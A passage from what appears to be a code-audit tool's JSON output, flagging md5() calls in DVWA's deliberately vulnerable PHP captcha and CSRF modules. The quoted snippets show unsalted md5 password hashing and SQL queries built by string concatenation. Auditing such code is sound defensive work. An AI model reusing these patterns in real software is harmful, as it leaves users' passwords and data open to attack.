"note": ""
},
{
"id": 113,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 24,
"start": 19,
"end": 30,
"severity": "unknown",
"note": ""
},
{
"id": 125,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">58:</span> \n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">62:</span> ",
"line": 57,
"start": 52,
"end": 63,
"severity": "unknown",
"note": ""
},
{
"id": 137,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">60:</span> \n<span class=\"line-number\">61:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">62:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">66:</span> \n<span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> ",
"line": 65,
"start": 60,
"end": 71,
"severity": "unknown",
"note": ""
},
{
"id": 148,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> ",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 156,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check that the current password is correct\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> password FROM users WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 157,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">23:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> both new passwords match <span class=\"token operator\">and</span> does the current password match the user<span class=\"token operator\">?</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">rowCount</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> It does!\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database <span class=\"token keyword\">with</span> new password\n<span class=\"line-number\">31:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token 